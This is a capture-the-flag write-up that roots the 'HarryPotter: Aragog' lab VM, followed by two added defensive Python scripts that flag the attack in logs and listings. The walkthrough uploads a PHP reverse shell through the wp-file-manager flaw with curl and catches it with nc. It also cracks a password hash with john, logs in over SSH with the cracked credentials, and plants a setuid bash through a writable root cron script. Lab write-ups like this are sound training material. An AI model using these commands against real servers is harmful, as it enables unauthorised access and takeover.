How I took down a machine called “HarryPotter: Aragog”

Overview:

Target Machine IP Address: 192.168.56.121  
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root
1. To get user flag
2. To get root flag
3. To get root access

Level: Medium

Although the author rated it easy, it took me close to 5 hours to take it down.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

This revealed the target (victim) machine's IP: 192.168.56.121

nmap -sC -sV -p- -Pn 192.168.56.121 -o nmap.log

Output: (Information redacted)

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)

Browsing website:

Directory brute-forcing on the web server

gobuster dir -u 192.168.56.121 -o gobuster.log

Output:

When we visit http://192.168.56.121/blog

This told us it is running a WordPress site, so I ran wpscan to gather more information about it.

wpscan --stealthy --url http://192.168.56.121/blog/ --plugins-version-detection aggressive --plugins-detection aggressive  -o wpscan-version.log

wpscan showed that the site is running an old plugin called ‘wp-file-manager’.

Vulnerable plugin: wp-file-manager
Version: 6.0

Googling for an exploit for this plugin version turned up a public PoC.

Details can be viewed here.

On Kali Linux Machine:

wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py

cp /usr/share/webshells/php/php-reverse-shell.php .

mv php-reverse-shell.php payload.php   (I rename the file because I am following the PoC mentioned in this link)

We have to set the IP address and port that the reverse shell connects back to in payload.php; in this case they are 192.168.56.1 (my machine) and 1234 (port number).

curl -k -F cmd=upload -F target=l1_ -F debug=1 -F 'upload[]=@payload.php' -X POST http://192.168.56.121/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

Open a new terminal on the Kali Linux machine:

nc -lvp 1234

On the Kali Linux machine (continuing from the curl command above):

curl -kiLsS http://192.168.56.121/blog/wp-content/plugins/wp-file-manager/lib/files/payload.php

In the new terminal window you should now have received a reverse connection.

$ id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@Aragog:/$ export TERM=xterm
export TERM=xterm
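From the defender's side, the two requests above (an unauthenticated POST to the plugin's connector, then a fetch of the uploaded PHP file) leave a clear trace in the Apache access log. The following is an added example, not part of the original writeup, that scans access-log lines for exactly that pattern. The log lines are constructed for the example (timestamps, sizes and the second client address are made up); the connector and upload paths are the ones this writeup uses.

```python
import re
from datetime import datetime

# Constructed sample Apache combined-log lines modelled on this writeup.
# Only the two paths under wp-file-manager are taken from the real plugin;
# everything else is made up for the example.
SAMPLE_LOG = """\
192.168.56.1 - - [28/May/2021:17:10:01 +0000] "POST /blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 512 "-" "curl/7.74.0"
192.168.56.1 - - [28/May/2021:17:10:20 +0000] "GET /blog/wp-content/plugins/wp-file-manager/lib/files/payload.php HTTP/1.1" 200 0 "-" "curl/7.74.0"
192.168.56.50 - - [28/May/2021:17:11:05 +0000] "GET /blog/ HTTP/1.1" 200 7321 "-" "Mozilla/5.0"
192.168.56.50 - - [28/May/2021:17:12:00 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Direct requests to the connector bypass WordPress authentication and are
# not part of normal use of the plugin; PHP under lib/files/ is a dropped file.
CONNECTOR = "/wp-file-manager/lib/php/connector.minimal.php"
UPLOAD_DIR = "/wp-file-manager/lib/files/"


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["status"] = int(d["status"])
    return d


def find_file_manager_abuse(log_text, window_seconds=600):
    """Return findings for connector POSTs and for PHP fetched from the plugin's
    upload directory; a fetch within window_seconds of a connector POST from the
    same client is rated high, because that is the upload-then-execute sequence."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    last_post = {}  # client ip -> timestamp of its most recent connector POST
    findings = []
    for e in events:
        path = e["path"].split("?", 1)[0]
        if e["method"] == "POST" and path.endswith(CONNECTOR):
            last_post[e["ip"]] = e["ts"]
            findings.append({"ip": e["ip"], "severity": "medium", "path": path,
                             "reason": "direct POST to wp-file-manager connector"})
        elif UPLOAD_DIR in path and path.lower().endswith(".php"):
            recent = (e["ip"] in last_post and
                      (e["ts"] - last_post[e["ip"]]).total_seconds() <= window_seconds)
            findings.append({"ip": e["ip"], "severity": "high" if recent else "medium",
                             "path": path,
                             "reason": "PHP requested from plugin upload directory"
                                       + (" shortly after connector POST" if recent else "")})
    return findings


if __name__ == "__main__":
    for f in find_file_manager_abuse(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["reason"], f["path"])
```

The same two paths make a reasonable web-server rule (block or alert on POSTs to `lib/php/connector.minimal.php` and on any `.php` request under `lib/files/`); updating the plugin removes the unauthenticated connector entirely.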

User flag: (there are two users; I will leave it to you to figure out which user's home directory holds the user flag)

horcrux1.txt
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

$ echo "MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==" | base64 -d
1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets

Since we know the site is WordPress based, I went looking for the wp-config file, but it was not under the usual location.

My knowledge of server setup came in handy.

The website's document root is /usr/share/wordpress.

However, I know that this wp-config.php is not the real one. I am a little impressed with the machine designer: one of my roles in my current organization is setting up WordPress environments, and I do my best to structure them so that an attacker has a hard time finding the config. Likewise, if I learn how the machine designer placed the wp-config.php, I will apply it in my upcoming project work. (On Debian's packaged WordPress, the wp-config.php in /usr/share/wordpress is only a stub that loads the real settings from /etc/wordpress/.) Anyway, let's find where it is located.

ls -lah

cd /etc/wordpress
ls -lah 
cat config-default.php

DB_NAME: wordpress
DB_USER: root
DB_PASSWORD: mySecr3tPass


On Kali Linux Machine:

echo '$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.' > hash.txt    # single quotes: in double quotes the shell would expand $P and $B
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

john --show hash.txt

Recall that during the initial scanning phase we saw that the machine is running an SSH service. Let's try to log in with the following credentials…

username: hagrid98
password: password123
Machine: 192.168.56.121

ssh hagrid98@192.168.56.121    # login succeeded

I poked around and couldn't find anything useful. It is my ritual at this point, when nothing useful turns up, to run linpeas.sh on the victim machine (I hope you have already picked up how to do this by now, i.e. serving it with SimpleHTTPServer 🙂).

It showed that the machine has an unusual file:

-rwxr-xr-x 1 hagrid98 hagrid98 81 Apr 1 20:03 /opt/.backup.sh

cat /opt/.backup.sh

#!/bin/bash
cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads

Checking the ownership of /tmp/tmp_wp_uploads, do you see what I see? It is owned by root (user and group), so the script is being run by root.

User hagrid98 has no crontab entry, but it looks like root does. Therefore, let us append the following line to the file .backup.sh above.

cp /bin/bash /tmp/bash && chmod +s /tmp/bash

Note: chmod +s sets the set-user-ID and set-group-ID bits on execution.

I waited around 5 minutes and finally got what I wanted: the copy of bash with the setuid bit set (rws).

hagrid98@Aragog:/tmp$ ls -lah
total 2.3M
drwxrwxrwt 10 root root 4.0K May 28 17:28 .
drwxr-xr-x 18 root root 4.0K Mar 31 17:52 ..
-rwsr-sr-x 1 root root 1.2M May 28 17:32 bash
-rwxr-xr-x 1 root root 1.2M May 28 17:24 bash1
drwxrwxrwt 2 root root 4.0K May 28 12:42 .font-unix
drwxrwxrwt 2 root root 4.0K May 28 12:42 .ICE-unix
drwx------ 3 root root 4.0K May 28 12:42 systemd-private-b275630ffd804e5187080888580cb0b0-apache2.service-JVTT6g
drwx------ 3 root root 4.0K May 28 12:42 systemd-private-b275630ffd804e5187080888580cb0b0-systemd-timesyncd.service-AHdvzF
drwxrwxrwt 2 root root 4.0K May 28 12:42 .Test-unix
drwxr-xr-x 5 root root 4.0K May 28 12:46 tmp_wp_uploads
drwxrwxrwt 2 root root 4.0K May 28 12:42 .X11-unix
drwxrwxrwt 2 root root 4.0K May 28 12:42 .XIM-unix
hagrid98@Aragog:/tmp$
hagrid98@Aragog:/tmp$ ./bash -p       # visit this link if you don't know why -p is needed here
hocrux: horcrux_{MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIGJZIERVbWJsZWRPcmU=}
In muggle terms: 2: maRvoLo GaUnt's riNg deStrOyed bY DUmbledOre
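The root cause of this escalation is a script executed by root's cron that is owned and writable by an unprivileged user, and the artefact it leaves behind is a root-owned setuid binary in /tmp. The following is an added example, not part of the original writeup, that audits both conditions: it parses a directory listing for setuid/setgid files and checks a cron-run script's ownership and mode. The inputs are constructed from the listing and the file metadata shown above (the `runs_as` field is an assumption supplied by the example, standing in for the crontab that schedules the script).

```python
import re

# Constructed sample: the /tmp listing after the backup job ran (taken
# from the listing above, minus the systemd and X11 entries).
TMP_LISTING = """\
drwxrwxrwt 10 root root 4.0K May 28 17:28 .
drwxr-xr-x 18 root root 4.0K Mar 31 17:52 ..
-rwsr-sr-x 1 root root 1.2M May 28 17:32 bash
-rwxr-xr-x 1 root root 1.2M May 28 17:24 bash1
drwxr-xr-x 5 root root 4.0K May 28 12:46 tmp_wp_uploads
"""

# Constructed sample: metadata of the script root's cron job runs.
# "runs_as" is assumed here; in practice it comes from the crontab entry.
CRON_SCRIPT = {"path": "/opt/.backup.sh", "mode": "-rwxr-xr-x",
               "owner": "hagrid98", "group": "hagrid98", "runs_as": "root"}

# One `ls -l` line: mode links owner group size month day time name
LS_RE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\S+\s+\S+\s+\d+\s+[\d:]+\s+(?P<name>.+)$"
)


def parse_ls(listing):
    """Parse `ls -l` style lines into dicts with mode, owner, group and name."""
    return [m.groupdict() for m in map(LS_RE.match, listing.splitlines()) if m]


# Mode string layout: [type][user rwx][group rwx][other rwx]
def is_setuid(mode):
    return mode[3] in "sS"


def is_setgid(mode):
    return mode[6] in "sS"


def find_setuid_files(listing, owner="root"):
    """Names of regular files in the listing that are setuid/setgid and owned
    by `owner`. In a world-writable scratch directory such as /tmp, a root-owned
    setuid shell is a classic privilege-escalation artefact."""
    return [e["name"] for e in parse_ls(listing)
            if e["mode"][0] == "-" and e["owner"] == owner
            and (is_setuid(e["mode"]) or is_setgid(e["mode"]))]


def cron_script_findings(script):
    """Reasons a script executed by root can be modified by someone else:
    foreign ownership, group-writable by a non-root group, or world-writable."""
    mode = script["mode"]
    problems = []
    if script["runs_as"] == "root" and script["owner"] != "root":
        problems.append(f"owned by {script['owner']} but executed as root")
    if mode[5] == "w" and script["group"] != "root":
        problems.append(f"group-writable by {script['group']}")
    if mode[8] == "w":
        problems.append("world-writable")
    return problems


if __name__ == "__main__":
    print("setuid/setgid root files in /tmp:", find_setuid_files(TMP_LISTING))
    print(CRON_SCRIPT["path"], "->", cron_script_findings(CRON_SCRIPT))
```

On a live host the first check is `find /tmp -xdev -type f -perm /6000 -user root`, and the fix for the second is simply `chown root:root /opt/.backup.sh` with a mode of 0755 or tighter; anything root runs on a schedule must not be writable by the users it is meant to be protected from.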
